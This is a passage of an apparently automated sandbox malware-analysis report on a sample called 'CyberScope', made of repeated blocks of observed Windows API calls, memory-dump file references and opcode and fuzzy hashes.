                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001CD169
                                                                                      • Part of subcall function 001C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C3BC5
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001CD18F
                                                                                    • _free.LIBCMT ref: 001CD1A2
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001CD1B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
                                                                                    • Opcode ID: a74352539e4a75d68801c4586d08930b297ecb2ddb346ccefb27e4adb4bbf056
                                                                                    • Instruction ID: 2a17ab6ed783e83ea89ee0cd7eabbf5f342d36619d8f5637dc0025e3cb3374cc
                                                                                    • Opcode Fuzzy Hash: a74352539e4a75d68801c4586d08930b297ecb2ddb346ccefb27e4adb4bbf056
                                                                                    • Instruction Fuzzy Hash: F30184766016157F332166B6BC8DE7F6AADDEE2B61319013DFD09C6244DB60CD0281B1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: 223ffda2a2f3c12b06127cae9abfd22854e7152030346bbd589aafcd9f7d629c
                                                                                    • Instruction ID: 394ab52c44f35573efbda6126fdbba378d561dcffb7c2a6ed1bd649252ae0258
                                                                                    • Opcode Fuzzy Hash: 223ffda2a2f3c12b06127cae9abfd22854e7152030346bbd589aafcd9f7d629c
                                                                                    • Instruction Fuzzy Hash: 7B01B5E560030D7BD61456209CA2FFBB35D9E6639CF224421FE0A9B641EF61ED20C2B1
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(75912E40,?,?,001BF64E,001C3BD6,?,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C3170
                                                                                    • _free.LIBCMT ref: 001C31A5
                                                                                    • _free.LIBCMT ref: 001C31CC
                                                                                    • SetLastError.KERNEL32(00000000), ref: 001C31D9
                                                                                    • SetLastError.KERNEL32(00000000), ref: 001C31E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 3363505bd004a27b05657c7ef1a24fe217776558fea2beff79d31278165f8a97
                                                                                    • Instruction ID: 29d552cbfd99f7211005a950f93f3d750f63a798c0d60b67ce708d3384b7aacf
                                                                                    • Opcode Fuzzy Hash: 3363505bd004a27b05657c7ef1a24fe217776558fea2beff79d31278165f8a97
                                                                                    • Instruction Fuzzy Hash: 5A01A972644A007FA6226674EC4EF6B15AD9BF1771729842CF83592191EF31CA024561
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?,?,001F0C4E), ref: 001F091B
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?), ref: 001F0936
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?), ref: 001F0944
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?), ref: 001F0954
                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?), ref: 001F0960
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: a7d8e2950d59b700ae7684ca13550f27299bc07bafd3676929b9c6df044578eb
                                                                                    • Instruction ID: 850dc968161dcfc9103a1f69f15b0b6dd7927775e7e432db006cc83ab81c1dcf
                                                                                    • Opcode Fuzzy Hash: a7d8e2950d59b700ae7684ca13550f27299bc07bafd3676929b9c6df044578eb
                                                                                    • Instruction Fuzzy Hash: 570184B2600208BFEB114F95DC48BAA7BEDEB88755F140114FA09D6112E7B1DD41DB60
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001FF2AE
                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 001FF2BC
                                                                                    • Sleep.KERNEL32(00000000), ref: 001FF2C4
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001FF2CE
                                                                                    • Sleep.KERNEL32 ref: 001FF30A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: bf6a7031d78c7c5f29c7d806ccc479c85785042a4db1d47f2cb2e5b8771f4f60
                                                                                    • Instruction ID: 4da8c638627b611ca5ce180a7634184360f9490daef5d083c7fa27db0eb19def
                                                                                    • Opcode Fuzzy Hash: bf6a7031d78c7c5f29c7d806ccc479c85785042a4db1d47f2cb2e5b8771f4f60
                                                                                    • Instruction Fuzzy Hash: 03016971C0161DEBDF10AFE4E84DAEEBB78FF08700F01046AEA05B2250DBB09566C7A1
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F1A60
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A6C
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A7B
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A82
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F1A99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 36b081bdbc69855e70578cda5e03a007b39e9a9aae0f68821d2b890070e207ca
                                                                                    • Instruction ID: fa0258578caec6eca4f51c9edcce65d73b312cf9909e5e6d811d82be977d6f80
                                                                                    • Opcode Fuzzy Hash: 36b081bdbc69855e70578cda5e03a007b39e9a9aae0f68821d2b890070e207ca
                                                                                    • Instruction Fuzzy Hash: 050181B5601605FFDB214FA4EC4DD6A3B6DEF84364B210454F945C7260DB31DC418A60
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001F1916
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001F1922
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001F1931
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001F1938
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001F194E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 8d9fa534a5a5e263f64faa68bb99e22a1c2410c28c4419d3bb88c0c9195ba173
                                                                                    • Instruction ID: ebdc7fd101d3d938bc653b715bb0cff1902e7f0d53eecaf811c240ac5648cdf9
                                                                                    • Opcode Fuzzy Hash: 8d9fa534a5a5e263f64faa68bb99e22a1c2410c28c4419d3bb88c0c9195ba173
                                                                                    • Instruction Fuzzy Hash: A9F03C75100315BBDB210FA5AC4DF563BA9EF897A0F100414FA4597260CB70D8118AA0
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001F1976
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001F1982
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F1991
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001F1998
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F19AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 9052b13c7a8415e02cd16c3774d217a3a52b8f42bf0dbc31ce65d5d042a66165
                                                                                    • Instruction ID: f7e0c81a5d42ec226ed167f3579f31a780a2dbf27aa8ef4ecb81bcb9e5706cb1
                                                                                    • Opcode Fuzzy Hash: 9052b13c7a8415e02cd16c3774d217a3a52b8f42bf0dbc31ce65d5d042a66165
                                                                                    • Instruction Fuzzy Hash: 35F06275100315BBD7214FA5EC5DF963B6DFF897A0F140414FA45C7260CB70D9118AA0
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00200B24,?,00203D41,?,00000001,001D3AF4,?), ref: 00200CCB
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00200B24,?,00203D41,?,00000001,001D3AF4,?), ref: 00200CD8
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00200B24,?,00203D41,?,00000001,001D3AF4,?), ref: 00200CE5
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00200B24,?,00203D41,?,00000001,001D3AF4,?), ref: 00200CF2
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00200B24,?,00203D41,?,00000001,001D3AF4,?), ref: 00200CFF
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00200B24,?,00203D41,?,00000001,001D3AF4,?), ref: 00200D0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: fbd40e704a24090019e6e8e5374ad72e38972fef0c7270ef7b000922a3283639
                                                                                    • Instruction ID: ead8e4b054e91b87e371925f937c0e0575fa75cca0ce445dd4a0929ea0d6db74
                                                                                    • Opcode Fuzzy Hash: fbd40e704a24090019e6e8e5374ad72e38972fef0c7270ef7b000922a3283639
                                                                                    • Instruction Fuzzy Hash: C301DC71800B069FEB30AFA6D8C0912FAF9BE502157108A3FD19252962C7B0A868CE80
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001F65BF
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 001F65D6
                                                                                    • MessageBeep.USER32(00000000), ref: 001F65EE
                                                                                    • KillTimer.USER32(?,0000040A), ref: 001F660A
                                                                                    • EndDialog.USER32(?,00000001), ref: 001F6624
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 708c6d19e5791d5e34a841043acd2cba4126fec455a22f9d28517b40af9323d8
                                                                                    • Instruction ID: 919661ee9724779b5361bfb35a29ca4c74f0640d06c8f98080a63c19cb7c19ec
                                                                                    • Opcode Fuzzy Hash: 708c6d19e5791d5e34a841043acd2cba4126fec455a22f9d28517b40af9323d8
                                                                                    • Instruction Fuzzy Hash: AA018130900308BBEB345F60ED4EBB67BBCFB10B05F000659A287A14F1DBF4AA458A90
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 001CDAD2
                                                                                      • Part of subcall function 001C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?), ref: 001C2D4E
                                                                                      • Part of subcall function 001C2D38: GetLastError.KERNEL32(?,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?,?), ref: 001C2D60
                                                                                    • _free.LIBCMT ref: 001CDAE4
                                                                                    • _free.LIBCMT ref: 001CDAF6
                                                                                    • _free.LIBCMT ref: 001CDB08
                                                                                    • _free.LIBCMT ref: 001CDB1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 46789f73beae70daf538bb491441c19dfe97b98ed07dd1a3fe20968d47a946bc
                                                                                    • Instruction ID: 472af8e2a21caadcbc156fa8f3018aadc459c60b2eb1b15f41b9a8404a777e80
                                                                                    • Opcode Fuzzy Hash: 46789f73beae70daf538bb491441c19dfe97b98ed07dd1a3fe20968d47a946bc
                                                                                    • Instruction Fuzzy Hash: CFF0B772545305AB8624EBA8F98AF2A77EDEE35B117A50C1DF04AD7551CB30FCC08A68
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 001C262E
                                                                                      • Part of subcall function 001C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?), ref: 001C2D4E
                                                                                      • Part of subcall function 001C2D38: GetLastError.KERNEL32(?,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?,?), ref: 001C2D60
                                                                                    • _free.LIBCMT ref: 001C2640
                                                                                    • _free.LIBCMT ref: 001C2653
                                                                                    • _free.LIBCMT ref: 001C2664
                                                                                    • _free.LIBCMT ref: 001C2675
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: d4bd6263bc6a35f89cfff0237d5a1657b02f8a859d232b5752b0f263593af512
                                                                                    • Instruction ID: 8747d4c81be10e424ece4752209d4cb8a43c933413f5cec3e4b183ab807a88ea
                                                                                    • Opcode Fuzzy Hash: d4bd6263bc6a35f89cfff0237d5a1657b02f8a859d232b5752b0f263593af512
                                                                                    • Instruction Fuzzy Hash: 76F0FE708417209B8712AFA4FC19E583B74FB34F51305890EF815D62B5CBB19992AFD8
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$_free
                                                                                    • String ID: a/p$am/pm
                                                                                    • API String ID: 3432400110-3206640213
                                                                                    • Opcode ID: b57d629014f08d572642d8db9af8b2735dda386809065b0031869c8e76ab2930
                                                                                    • Instruction ID: 807193420a5e68527c349a42a79fa39beb3b242a1796fd71cbde1e779a6bb8e1
                                                                                    • Opcode Fuzzy Hash: b57d629014f08d572642d8db9af8b2735dda386809065b0031869c8e76ab2930
                                                                                    • Instruction Fuzzy Hash: 5BD1EF75990216EACB289F68C895FBAB7B1FF37310F29415EE9029B252D374CD40CB90
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 0019D253
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: t5&$t5&$t5&
                                                                                    • API String ID: 1385522511-703875400
                                                                                    • Opcode ID: a4cd0a82011f757e8593dda4052be42a704a255087c857a92aff6322755be79d
                                                                                    • Instruction ID: a31fb32d5c6fdaafaffcce57a01b620aa8e5da24bf2424fe15bce1ba31cbccd2
                                                                                    • Opcode Fuzzy Hash: a4cd0a82011f757e8593dda4052be42a704a255087c857a92aff6322755be79d
                                                                                    • Instruction Fuzzy Hash: 63914A75A00206DFCF18CF58E4906AAB7F1FF58310F65816AE956AB350D731EA82CF90
                                                                                    APIs
                                                                                      • Part of subcall function 001FBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001F2B1D,?,?,00000034,00000800,?,00000034), ref: 001FBDF4
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001F30AD
                                                                                      • Part of subcall function 001FBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001F2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 001FBDBF
                                                                                      • Part of subcall function 001FBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 001FBD1C
                                                                                      • Part of subcall function 001FBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 001FBD2C
                                                                                      • Part of subcall function 001FBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 001FBD42
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001F311A
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001F3167
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: 74731d49d620a9fed459c7631d3518fc4969b969b25b2182fb5fb5af077b22d7
                                                                                    • Instruction ID: 5eb477d05ab7a3a38ab80a4c333a90c6ed78628d9bf3a9da73fd5b674303610c
